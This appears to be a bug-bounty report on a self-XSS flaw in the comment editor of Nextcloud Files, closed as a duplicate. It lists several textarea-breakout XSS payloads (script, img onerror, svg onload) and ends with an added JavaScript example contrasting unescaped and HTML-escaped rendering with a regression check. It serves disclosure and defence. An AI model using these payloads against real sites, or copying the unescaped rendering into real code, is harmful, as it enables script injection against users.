Reflected Self-XSS Vulnerability in the Comment section of Files (Different-payloads)
Nextcloud
Reported by
shivakumar143
Vulnerability Details
Technical details and impact analysis
Note: steps mentioned in report #164027
In the Comments Box, the payload to execute XSS is passed.
Test Payloads:
</textarea><script>alert(1)</script>
Also, the above payload is still working.
Also try this payload
</textarea>"><img src=x onerror=prompt('XSS');>
</textarea><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
</textarea><svg/onload=alert('XSS')>
</textarea>foo<script>alert(1)</script>
Click edit comment after posting.
XSS triggers.
Report Details
Additional information and metadata
State
Closed
Substate
Duplicate
Submitted
Weakness
Cross-site Scripting (XSS) - Generic
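
Every payload in the report opens with a closing textarea tag and fires when the comment is opened for editing, which is consistent with stored comment text being written into the edit form's textarea markup without HTML-escaping; that reading is an assumption, since the report does not show the rendering code. The following is an added example, not code from the report or from Nextcloud: the function names and the form markup are hypothetical, and it sets the unescaped rendering beside an escaped one with a regression check run over the report's payloads.

```javascript
// Added example; all function names and the form markup are hypothetical.
// Payloads exactly as quoted in the report above.
const REPORT_PAYLOADS = [
  "</textarea><script>alert(1)</script>",
  "</textarea>\"><img src=x onerror=prompt('XSS');>",
  '</textarea><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>',
  "</textarea><svg/onload=alert('XSS')>",
  "</textarea>foo<script>alert(1)</script>",
];

// Weak form (assumed): the stored comment is concatenated into the markup as-is.
function renderEditFormUnsafe(comment) {
  return '<textarea name="message">' + comment + "</textarea>";
}

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode the characters that can open a tag, an entity or an attribute value.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened form: the browser decodes the entities, so the user still sees the original text.
function renderEditFormSafe(comment) {
  return '<textarea name="message">' + escapeHtml(comment) + "</textarea>";
}

// Textarea content is RCDATA: only a literal closing textarea tag ends it.
// The template emits exactly one, so a second one means the comment closed the element early.
function textareaClosedEarly(html) {
  return (html.match(/<\/textarea/gi) || []).length > 1;
}

// Returns the report payloads that still break out of the textarea for a given renderer.
function audit(render) {
  return REPORT_PAYLOADS.filter((p) => textareaClosedEarly(render(p)));
}

console.log("unsafe renderer, payloads breaking out:", audit(renderEditFormUnsafe).length);
console.log("escaped renderer, payloads breaking out:", audit(renderEditFormSafe).length);
```

In a browser, assigning the comment to the textarea's value property instead of building markup avoids HTML parsing of the comment altogether.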